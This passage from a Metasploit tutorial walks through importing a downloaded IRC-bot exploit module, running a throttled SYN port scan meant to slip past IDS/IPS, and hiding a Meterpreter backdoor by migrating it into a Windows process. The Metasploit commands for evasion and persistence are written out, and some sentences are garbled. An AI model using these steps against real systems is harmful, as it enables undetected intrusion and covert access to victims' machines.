- wget is the command for downloading the exploit file - mv is the command for renaming and moving the file

FIGURE 79: DOWNLOAD EXPLOIT AND IMPORT TO METASPLOIT DIRECTORY

After downloading the exploit to be imported, run the command reload_all to reload all settings that have been changed before.

FIGURE 80: RELOAD ALL NEW MODULE ON METASPLOIT After reloading all new modules on Metasploit, you can search for module with the command:

msf> search cupenkz

FIGURE 81: SEARCHING CUPENKZ EXPLOIT

There is one exploit named cupenkz, with the description “exploit Pitbul IRC Bot Remote Code Execution.” Now use the exploit with the command:

msf> use exploit/cupenkz

FIGURE 82: USE EXPLOIT CUPENKZ

6. Stealthy techniques when using Metasploit.

Stealthy techniques are methods by which the attacker installs a backdoor so that targets that have been acquired can be entered at any time; the attacker can then perform scanning and other techniques in many circumstances where it seems unimaginable. In this example, the target has IDS/IPS, which is very paranoid, so that when it is done, the IDS/IPS instantly displays a warning and alerts the attacker. The target also has AV/antirootkit so, when installing a backdoor, it will be known by admin.

This time I pointed out that the attacker is scanning the target and is not suspicious. However, not all administrators can bypass, because setting a system depends on whether or not it is paranoid about that setting.

First of all, I run Metasploit with the command: root@sungai:~# msfconsole

FIGURE 83: START METASPLOIT Then use the module auxiliary/scanner/Portscan/syn:

FIGURE 84: USING AUXILIARY/SCANNER/PORTSCAN/SYN

The module option can be seen above; it appears that the attacker can adjust the settings for how many ports will be scanned and how much timeout is used. It is as if you are knocking on a door: If you knock on the door as much as 100 times, it will be more audible than if you knock on the door 2 times. Likewise, in scanning techniques, if you send multiple packets as much as 100 times, it will look more suspicious than if you transmit a packet 2 times. Here I set up to do the scanning of ports 20-30 only, and setting timeout to 200. Use the command

msf auxiliary (syn)> set ports 20-30 msf auxiliary (syn)> set timeout 200

FIGURE 85: SETTING PORT AND TIMEOUT After setting port and timeout, you must set the IP target, with the command:

msf auxiliary (syn)> set rhosts 192.168.109.1

FIGURE 86: SETTING IP TARGET Then you can run with the command:

msf auxiliary (syn)> run

FIGURE 87: RUNNING SYN SCAN7

From the picture above, we see that the target has port 22 open. The result of port scanning is short because I did not use random port scanning and tried to do stealthy scanning

My second example is where, after getting access to a computer target, I put a stealth backdoor into the victim's computer. The backdoor is installed here using the migrate feature contained in Meterpreter. The feature creates a fictitious process on the target computer.

Here I use the PS command in Meterpreter when a target has been hacked:

FIGURE 88: PROCESS ON COMPUTER TARGET

The picture above shows all processes on the target computer; after I see all these processes, I use the command: Meterpreter > run post/windows/manage/migrate

FIGURE 89: MAKE FICTITIOUS PROCESS ON THE TARGET COMPUTER

The picture above shows that the command creates a fictitious process for Meterpreter so the svchost.exe process is ma-nipulated to run Meterpreter on the target computer. The results are shown below:

FIGURE 90: FICTITIOUS PROCESS RUNNING

Results from the victim's computer that is running a fictitious process show the process PID 1240 running notepad.exe, where the application is fictitious.